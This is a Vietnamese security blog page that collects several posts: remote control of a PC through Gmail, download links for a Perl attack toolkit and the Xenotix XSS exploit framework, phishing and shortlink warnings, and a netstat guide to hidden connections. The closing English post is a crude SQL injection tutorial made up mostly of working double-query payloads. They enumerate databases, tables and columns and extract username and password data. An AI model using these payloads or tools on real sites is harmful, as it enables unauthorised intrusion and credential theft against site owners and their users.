Trang

Điều khiển máy tính từ xa qua Gmail

Có một vài tiện ích cho phép tạo kết nối điều khiến từ xa với máy tính. Nếu bạn đang cần gấp một kết nối để điều khiển máy tính từ xa mà chỉ yêu cầu mức cơ bản với cấu hình tối thiểu thì bạn có thể thực hiện thông qua tài khoản Gmail. sRemote là một ứng dụng bỏ túi nhỏ cho phép điều khiển từ xa máy tính thông qua tài khoản Gmail. Chương trình cho phép thực hiện một số câu lệnh cơ bản trên máy đầu xa qua Gmail.

Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.

[Hình: sremote1.jpg]

Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.

Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.

[Hình: sremote2.jpg]

Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.

Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.

[Hình: sremote3.jpg]

Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:

password() ;command() ;

Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.

[Hình: sremote4.jpg]

sRemote chấp nhận những câu lệnh sau:

1. screenshot() ;
2. shutdown() ;
3. logoff() ;
4. restart() ;
5. abort() ;
6. run(program,parameters) ;
7. play(path) ;
8. msg(text) ;
9. log(text) ;
10. exit() ;
11. beep() ;
12. forceshut() ;
13. mail(sender,password,receiver,body,subject) ;
14. processes() ;
15. ping(address) ;
16. getfile(path) ;
17. delfile(path) ;
18. deldir(path) ;
19. uptime() ;
20. copy(oldpath,newpath) ;
21. move(oldpath,newpath) ;
22. help() ;

Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.

Link sRemote: https://sites.google.com/site/venussoftr...ects=0&d=1

Xem Thêm

 

Perl Attack Tools

Giới thiệu về tính năng các lựa chọn trong menu mình sẽ giới thiệu sau. Đây là demo của em nó!
[Hình: talent.PNG]
***mình hi vọng tool được ủng hộ và phát triển ở Việt Nam. Mọi sự sao chép mong các bạn tôn trọng bản quyền của tác giả
Thanks to -->Persia Security Group<--
links: http://www.mediafire.com/?nq8o41fyfqtisah
pass: talentkong@ceh.vn

Xem Thêm

 

Xenotix XSS Exploit Framework v.2 Released

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS.
test report.

Features: 

Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
 XSS Reverse Shell (new)

Download: https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip

Xem Thêm

 

4 vấn nạn bảo mật đáng sợ nhất 2013

Bảo mật di động và phần mềm tống tiền “nổi loạn”, xung đột mạng trở nên căng thẳng hơn, các chuyên gia bảo mật đã chỉ ra 4 xu hướng bảo mật nổi bật của năm 2012 và nhiều khả năng sẽ tiếp diễn trong năm 2013.

1. Xung đột mạng trở nên phổ biến


[Hình: 20121221111311-secure.jpg]

Năm 2013 và cả những năm tiếp sau, xung đột mạng giữa các quốc gia, các tổ chức và cá nhân sẽ trở thành tâm điểm trong thế giới mạng. Gián điệp công nghệ vừa có tỷ lệ thành công cao, vừa dễ dàng phủi tay, chối bỏ trách nhiệm sau khi tiến hành. Đã có nhiều ví dụ thực tế để cảnh báo về xu hướng này trong vòng 2 năm trở lại đây mà điển hình là vụ sâu Stuxnet tấn công Iran. Trong năm 2013, chúng ta sẽ thấy môi trường mạng trở thành một chiến trường khi mà các quốc gia, các tổ chức, thậm chí các nhóm và các cá nhân sử dụng những cuộc tấn công mạng để thể hiện sức mạnh của họ hay đơn thuần chỉ là “gửi đi thông điệp”.

Bên cạnh đó, hãng bảo mật Symantec cũng dự đoán sẽ có nhiều cuộc tấn công mạng nhắm tới các cá nhân và các tổ chức phi chính phủ, chẳng hạn như những người/nhóm người ủng hộ các vấn đề về chính trị và thành viên của các nhóm dân tộc thiểu số xung đột với nhau. Loại hình tấn công có chủ đích này đã xuất hiện khi các nhóm hacker như LulzSec hay Anonymous được hỗ trợ bởi một cá nhân hoặc một công ty đứng đằng sau.

2. Phần mềm tống tiền (ransomeware) trở thành nỗi ám ảnh mới


[Hình: 20121221111549-ransomware-%281%29.jpg]

Khi phần mềm diệt virus giả mạo tạm lắng xuống thì một mô hình doanh nghiệp tội phạm, mới và cao cấp hơn sẽ lại nổi lên. Symantec dự báo phần mềm tống tiền (ransomeware) sẽ phát triển mạnh do chúng không chỉ lừa phỉnh nạn nhân mà còn đe dọa và bắt nạt họ. Mặc dù “mô hình kinh doanh” này đã từng được thử nghiệm trước đó nhưng nó cũng có những mặt hạn chế tương tự như kiểu “bắt cóc tống tiền” trong đời sống thực: không có một cách thức nào là hoàn hảo để thu tiền cả. Tuy vậy, tội phạm mạng ngày nay đã tìm ra một giải pháp cho vấn đề này, đó là sử dụng các phương thức thanh toán trực tuyến. Chúng có thể dùng áp lực thay vì phải bịa chuyện để lấy tiền từ nạn nhân.

Một trong những khả năng quan trọng là phần mềm tống tiền sẽ vượt mặt các phần mềm diệt virus giả mạo để trở thành con át chủ bài của tội phạm mạng trong năm tới.

3. Phần mềm quảng cáo di động tăng mạnh

[Hình: 20121221111549-android-malware.jpg]

Phần mềm quảng cáo trên di động (mobile adware - còn gọi tắt là madware) là những phần mềm khá phiền toái và làm gián đoạn trải nghiệm người dùng. Không chỉ vậy, những phần mềm này còn tiềm ẩn rủi ro như làm lộ chi tiết về địa điểm, thông tin liên lạc cũng như nhận dạng thiết bị cho tội phạm mạng. Madware sẽ lẻn vào thiết bị của người dùng khi họ tải về một ứng dụng và thường xuyên gửi các pop-up cảnh báo trên thanh thông báo thêm biểu tượng, thay đổi cài đặt trình duyệt và thu thập thông tin cá nhân.

Chỉ trong vòng 9 tháng vừa qua, số lượng các ứng dụng, bao gồm cả những biến thể phần mềm quảng cáo di động táo tợn nhất, đã tăng lên tới 210%. Việc sử dụng phần mềm quảng cáo di động sẽ tăng mạnh do ngày càng có nhiều công ty mong muốn tăng trưởng lợi nhuận nhanh chóng thông qua quảng cáo di động.

4. Kiếm tiền trên các mạng xã hội – những kẽ hở mới nguy hiểm

[Hình: 20121221111743-facebook-woman.jpg]

Là người dùng, chúng ta đặt một niềm tin khá lớn vào mạng xã hội – từ việc chia sẻ những thông tin cá nhân tới việc chi tiền cho các trò chơi, tặng quà cho bạn bè. Khi những mạng xã hội này bắt đầu hình thành các phương thức kiếm tiền trên các nền tảng của họ bằng cách cho phép người dùng mua và gửi những món quà thật, thì xu hướng tiêu dùng ngày càng tăng trên các mạng xã hội cũng gợi ý cho tội phạm mạng những phương pháp mới để tạo tiền để cho các cuộc tấn công của chúng.

Các chuyên gia bảo mật dự đoán số lượng các cuộc tấn công bằng phần mềm độc hại nhằm ăn cắp thông tin thanh toán của người dùng trên các mạng xã hội hoặc lừa phỉnh họ cung cấp các chi tiết thanh toán hoặc những thông tin cá nhân/ thông tin có giá trị tới các mạng xã hội giả mạo sẽ tăng mạnh. Cụ thể, người dùng có thể nhận được thông báo về một món quà giả mạo và những thông điệp gửi qua email, yêu cầu họ cho biết địa chỉ nhà và những thông tin cá nhân khác. Mặc dù cung cấp thông tin phi tài chính có vẻ là vô thưởng vô phạt, nhưng tội phạm mạng có thể bán và giao dịch những thông tin này với nhau để kết hợp với thông tin mà chúng đã có sẵn về bạn. Điều này có thể giúp chúng tạo ra một hồ sơ cá nhân riêng về bạn và sau đó sử dụng để tìm cách truy nhập vào các tài khoản khác của bạn.


Theo Vietnamnet

Xem Thêm

 

Cảnh báo: Phising email lừa gạt cư dân Facebook

Phishing email là loại email trá hình nhằm lừa gạt người sử dụng. Trong nhiều trường hợp đường dẫn tin tặc cung cấp chứa đầy vi rút.

Đây là một ví dụ gần đây, tin tặc tìm cách lừa gạt cư dân Facebook.

[Hình: Screen-Shot-2012-12-20-at-12.53.18-PM.png]


Khi nhận được email bên dưới và mới đọc thoáng qua, chúng ta nghĩ là Facebook thông báo cho biết tài khoản Facebook của mình đã bị khóa lại. Do đó phải bấm vô đường dẫn trong email để xác nhận.

Tuy nhiên nếu xem kỹ lại thì

1. Hàng From: tuy đề là Facebook.Team nhưng địa chỉ lại là @blackswantribe.com.au. Rõ ràng đây là email giả mạo rồi.

2. Đường dẫn (URL) trong email nhìn thì thấy là http://www.facebook.com, nhưng nếu nhấp chuột (đừng bấm chuột) vào thì địa chỉ thật sự hiện ra lại là http://datingcool-2013.info/.....

Do đó bạn đừng bao giờ vội bấm vào bất cứ đường dẫn nào trong một email dù là khả nghi hay là có vẻ như đến từ người quen. Phải phối kiểm lại cho kỹ. Nếu không chắc, không thấy an tâm thì tốt nhất chúng ta lờ đi.

Trong trường hợp này, thay vì bấm vào đường dẫn, bạn kiểm tra bằng cách đăng nhập Facebook như thường lệ. Nếu vẫn đăng nhập bình thường, thì đây rõ ràng là email giả mạo.

Xem Thêm

 

PHP Application Security Checklist

Xem Thêm

 

Thủ thuật kiểm tra link thật của các shortlink nhanh chóng

Hiện có rất nhiều dịch vụ rút gọn link (shortlink), thường thấy như goo.gl, tinyurl.com, bit.ly... Việc rút gọn link giúp cho các liên kết dài dòng được rút lại rất gọn, thuận lợi cho việc chia sẻ chúng với mọi người. Một số dịch vụ rút gọn link cung câp một số tính năng như thống kê lượng người click, số click này đến từ website nào...

Đó là ưu điểm của việc rút gọn link, nhưng có trường hợp một số kẻ xấu lợi dụng các shortlink để link tới các website có nội dung không tốt hay các đến các website có chứa mã độc nhằm lấy cắp thông tin người dùng. Việc biết trước liên kết thực sự một shortlink là việc làm cần thiết.

Sử dụng IDM

Bạn có thể biết trước link thật một shortlink rất dễ dàng bằng chương trình tăng tốc download quen thuộc IDM.

[Hình: kiem-tra-link1.jpg]

[Hình: kiem-tra-link2.jpg]

Trong giao diện IDM, bạn chọn Add URL, rồi nhập shortlink cần kiểm tra vào khung Address > OK. Ngay lập tức link thật sẽ "hiện nguyên hình" trong hộp thoại Download File Info. Nếu thấy website muốn truy cập an toàn bạn có thể an tâm sử dụng shortlink này.

Sử dụng Decryptlinks

Decryptlinks hỗ trợ xem link thật của hơn 70 dịch vụ shortlink thông dụng hiện nay như

[Hình: kiem-tra-link3.jpg]

Cách sử dụng Decryptlinks rất đơn giản. Ban truy cập địa chỉ http://www.decryptlinks.com, paste link rút gọn vào ô decrypt rồi nhấn Decrypt, ít giây sau ban sẽ nhận được link thật phía dưới. Decryptlinks cung cấp thêm một số thông tin về website đó chẳng hạn như title, description, keyword, trust level, screenshot.

[Hình: kiem-tra-link4.jpg]

Ngoài ra, Decryptlinks còn cung cấp thêm add-on cho Firefox giúp việc kiểm tra shortlink tiện lợi, nhanh chóng hơn. Bạn nhấn vào chữ Firefox Addon trên menu bar để cài addon này. Addon này sẽ được tích hợp vào thanh tìm kiếm bên trái Firefox, bạn chỉ việc chọn biểu tượng search Decrypt Short Links, paste link vào rồi Enter.

Sử dụng Unshorten.

Cũng tương tự như Decryptlinks, Unshorten cung cấp khả năng hiện link thật của nhiều dịch vụ shortlink. Trong kết quả trả về, Unshorten đưa ra một số cảnh báo bảo mật về shortlink đó thông qua dịch vụ Web of Trust, các thông tin này bao gồm

[Hình: kiem-tra-link5.jpg]

Trustworthiness: mức độ tin cậy shortlink.
Vendor reliability: mức độ tin cậy của nhà cung cấp.
Privacy: mức độ riêng tư.
Child safety: độ an toàn cho trẻ em.

Hiện tại, Unshorten còn cung cấp extension cho trình duyệt Chrome và Firefox, bạn tải extension này về tại
http://unshorten.it/browser-extensions

[Hình: kiem-tra-link6.jpg]

Sau khi cài đặt thành công, Unshorten sẽ được thêm vào menu ngữ cảnh của trình duyệt, muốn kiểm tra shortlink nào chỉ việc phải chuột vào link đó, chọn Unshorten this link…

Xem Thêm

 

Kiểm tra các kết nối ẩn vào Internet trong Windows

Kết nối Internet của bạn chậm hơn bình thường? Phải chăng máy tính của bạn đã nhiễm malware, spyware hay adware, chúng đang chạy trong chế độ nền và tiêu tốn băng thông mà bạn không hề biết? Sau đây là vài thủ thuật giúp bạn kiểm tra được các kết nối từ máy tính của bạn vào Internet.

Máy tính của bạn đang kết nối đến những đâu?

Với các phiên bản Windows bạn có thể sử dụng câu lệnh netstat trong command prompt. Nó sẽ đưa ra danh sách tất cả các chương trình đang sử dụng kết nối Internet trong một khoảng thời gian nhất định.

Đầu tiên bạn cần chạy command prompt với quyền admin. Từ menu Start bạn gõ “cmd.exe” trong ô tìm kiếm. Bạn sẽ thấy chương trình cmd.exe, hãy click chuột phải vào chương trình đó và chọn “Run as administrator”.

[Hình: cmd1.jpg]

Nếu có hộp thoại của User Account Control yêu cầu xác nhận, bạn chọn Yes.

[Hình: cmd2.jpg]

Trong command prompt, gõ câu lệnh sau và nhấn Enter:

netstat -abf 5 > activity.txt

Tùy chọn -a sẽ hiển thị tất cả các kết nối và cổng đang chờ kết nối. Tùy chọn -b cho bạn biết ứng dụng nào đang kết nối, và -f sẽ cho biết DNS của mỗi kết nối để dễ hiểu hơn về nơi mà kết nối đang tồn tại. Bạn có thể sử dụng thêm tùy chọn -n nếu bạn muốn hiển thị IP của kết nối tới. Số 5 trong câu lệnh cho biết cứ sau 5 giây thì chương trình sẽ kiểm tra lặp lại một lần và kết quả sẽ được lưu trong file activity.txt.

Chờ trong khoảng 2 phút rồi nhấn Ctrl + C để dừng câu lệnh.

[Hình: cmd3.jpg]

Sau khi kết thúc việc ghi dữ liệu hãy mở file activity.txt bằng trình soạn thảo quen thuộc của bạn. Ở đây chúng tôi dùng Notepad.

Nội dung của file activity.txt sẽ là tất cả các tiến trình trên máy bạn (như trình duyệt, chương trình email, chat...) có kết nối vào Internet trong 2 phút chạy chương trình netstat.

[Hình: cmd4.jpg]

Nếu bạn thấy bất cứ process hay tên, địa chỉ website nào lạ, hãy search thông tin về nó trên Google. Có thể đó là một chương trình hệ thống nhưng cũng có thế đó là một chương trình virus, gián điệp... Dù sao nếu bạn nghi ngờ về nó, hãy tìm kiếm thông tin, hỏi trên các diễn đàn đến khi biết chắc chắn nó là gì.

[Hình: cmd5.jpg]

Dùng chương trình CurrPorts để kiểm tra các kết nối ẩn

Bạn cũng có thể sử dụng một phần mềm miễn phí tên CurrPorts để đơn giản hóa cách thức sàng lọc lấy thông tin. Chương trình này cung cấp một giao diện thân thiện hơn giúp bạn xem tất cả các kết nối TCP/IP và cổng UDP đang mở trên máy tính. CurrPorts là một chương trình portable, bạn không cần phải cài đặt để dùng.

[Hình: CurrPorts.jpg]

Bạn sẽ nhận được một file .zip, giải nén nó và chạy file cports.exe. Chương trình hiển thị rất chi tiết và trực quan về các process, port, IP... bạn có thể lưu thông tin chương trình quét được vào các text hay HTML, XML để tiện cho việc phân tích về sau.

neo0 (Howtogeek)

Xem Thêm

 

Xác định tài khoản nguời dùng Gmail bị hack

Xin chào tất cả các bạn!

Hôm nay mình chia sẽ cho các bạn kỹ thuật mà bạn có thể sử để bắt các hacker.

Nếu bạn có nghi ngờ tài khoản Gmail của mình bị truy cập trái phép, các bạn có thể thực hiện theo các bước sau để xác định kẻ đã truy cập và hộp thư của mình.

1. Kiểm tra lịch sử truy cập

- Đăng nhập vào tài khoản Gmail của bạn và bạn kéo xuống bên dưới của trang web.

[Hình: Gmail.jpg]

- Nhấp chọn chi tiết

[Hình: Gmail-Account-Hack.jpg]

Bây giờ, bạn có thể xem danh sách 10 địa chỉ ip mà bạn hay hacker đăng nhập vào tài khoản của bạn.

+> Địa chỉ IP: Là địa chỉ giao thức Internet (IP Address) là một con số được gán cho các thiết bị trong mạng máy tính (PC) như số điện thoại được gán cho mỗi điện thoại.

+> Cột 1 là phương thức truy cập, nếu bạn đang truy cập vào tài khoản Gmail của bạn từ trình duyệt sau đó bạn sẽ thấy trình duyệt trong cột này, nhưng nếu bảng hoạt động gần đây của bạn được hiển thị một số truy cập POP (Outlook, Thunderbird ...), nó có thể là một dấu hiệu rằng tài khoản của bạn đã bị xâm nhập.

+> Cột 2 (Location), cột này cho thấy địa chỉ IP của bạn từ nơi mà bạn đã truy cập tài khoản của bạn. Bạn có thể sử dụng trang web này Locator IP sẽ hỗ trợ bạn trong việc định vị vị trí địa lý của một địa chỉ IP.

Bạn xem thông tin nhiều hơn xem. Bạn sẽ thấy rất nhiều thông tin như ISP, tên, địa chỉ, số điện thoại liên lạc, địa chỉ email ... mà sẽ giúp bạn quyết định xem tài khoản của bạn đã bị xâm nhập hay không.

Nếu thư của bạn hiện đang được truy cập từ một vị trí khác, bạn sẽ thấy danh sách các phiên truy cập trong bảng thông tin . Bạn thay đổi mật khẩu của bạn nếu bạn nghĩ rằng tài khoản của bạn đã bị xâm nhập.

Hy vọng bạn thích bài viết này, chúc các bạn bảo mật tốt hơn.

Xem Thêm

 

Ngăn chặn bị ngắt kết nối khi download trong Windows


Khi đang thực hiện tải các tập tin có dung lượng lớn từ Internet về máy tính. Đột nhiên, Windows rơi vào trạng thái ngủ đông để tiết kiệm năng lượng theo thời gian mặc định đã làm gián đoạn công việc đang thực hiện công việc, tiêu tốn thêm thời gian và phí Intenrnet của bạn.

Bài viết này sẽ giới thiệu một ứng dụng xách tay nhỏ gọn cho phép bạn ngăn chặn các chế độ tự động của Windows như Shutdown, Reboot, Stanby, Turn Off, Hibernation một cách hữu hiệu, ứng dụng có tên Don't Sleep.

[Hình: 11.png]

Don't Sleep là một ứng dụng xách tay không cần cài đặt, sau khi tải về giải nén kích hoạt tập tin thực thi DontSleep.exe để ngăn chặn Windows kích hoạt các chế độ Stanby, Hybrid-Stanby, Hibernation, Reboot, Shutdown nhằm tránh việc mất quyền kiểm soát máy tính của bạn từ các hoạt động ngầm mặc định của Windows. Ngoài ra, ứng dụng cũng có thể ngăn chặn hoạt động của chế độ bảo vệ màn hình để không làm gián đoạn công việc của bạn.

Chức năng

Don't Sleep: cung cấp các tính năng cho phép bạn thực hiện với ứng dụng như:

To-Tray: Hiển thị trên thanh hệ thống.


Hide: Ẩn ứng dụng nếu muốn hiển thị trở lại bạn phải kích hoạt tập tin thực thi dontSleep.exe, không nên sử dụng.


Minimize to tray if Minimize: Hiển thị thu nhỏ trên thanh hệ thống khi bạn muốn thu nhỏ ứng dụng để làm việc với các ứng dụng khác.


Minimize to tray if Close: Hiển thị trên thanh hệ thống khi bạn nhấn đóng cửa sổ ứng dụng.


Enabling the Mini-HTTP feature: Kích hoạt chức năng kết nối với giao thức HTTP qua các cổng mặc định là 8080


Start Parameter: Hiển thị các tham số thực hiện việc vô hiệu hóa các chức năng.


Exit: Thoát khỏi ứng dụng.


System: Cho phép bạn liên kết nhanh với các chức năng của hệ thống như Task Manager, System, Power Config, Desktop, Monitor, Screensaver Timeout, Screensave, User Accounts, System Configuration và System Information.

Nút Option trong khung Blocking ứng dụng cung cấp các chức năng cho phép bạn thực hiện áp đặt thời gian sử dụng với Don't Sleep thông qua 2 tiện ích Program Star, When you reactivate the PC (from stanby...), hiển thị biểu tượng trên thanh hệ thống hoặc khởi động ứng dụng cùng Windows v.v....

Tại khung Timer ứng dụng cung cấp một số tiện ích cho phép bạn thực hiện để kích hoạt lại các tính năng và làm việc với Windows ở các chế độ sau khi thoát khỏi ứng dụng như:

Exit and Stop Blocking: Thoát và ngưng việc vô hiệu hóa các tính năng.


Exit and Shutdown: Thoát và tắt máy tính.


Exit and aggressive Shutdown: Thoát và ép buộc tắt máy tính.


Exit and Standby/Hibernation: Thoát và làm việc với Windows ở chế độ chờ/ngủ đông.


Disable Blocking: Vô hiệu hóa việc ngăn chặn các chế độ của Windows.


Lưu ý: Tác giả khuyên bạn hãy sử dụng chức năng Exit and Stop Blocking để tránh gián đoạn công việc nếu lỡ tay thoát khỏi ứng dụng và không làm tổn hại đến hoạt động của hệ thống khi bị chuyển đổi chế độ một cách bắt buộc.

Link: http://www.download.com.vn/don-t-sleep/download

Xem Thêm

 

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...



Anyways, lets begin:


Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:

Code:


Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--

No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:

Code:
Mã:
Different Number of Columns

So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...

Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).


Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...


Ok, lets get the boring stuff but they are important:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...

Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...

So whatever happens stick to that code up there and enough with bullshits...


Okay, so now we got these info, now lets get the Databases...

Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...

Example for Double Query:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...

use this one:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--

And this will show you ALL THE DATABASES AT ONCE...

but using this gay code:

Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--

will only show 1 Database...



Ok so now he have all the Databases, lets move on to getting the Tables...

This is what you should use to get the Tables:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x"HEXDATABASE" AND table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...


Now lets Retrieve Data from the Columns, that's the good part lol:

So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...

Let me first show you what other people use and how gay it is and why...

Some people use this:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM "databasename"."tablename" LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...


Now some people use this one:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select concat(username,0x7e,pass,0x7e7e) from "table" limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...

So here's what to use:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...


Some Fucking Stuff you should know:

1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid


Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...

Take care all,

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương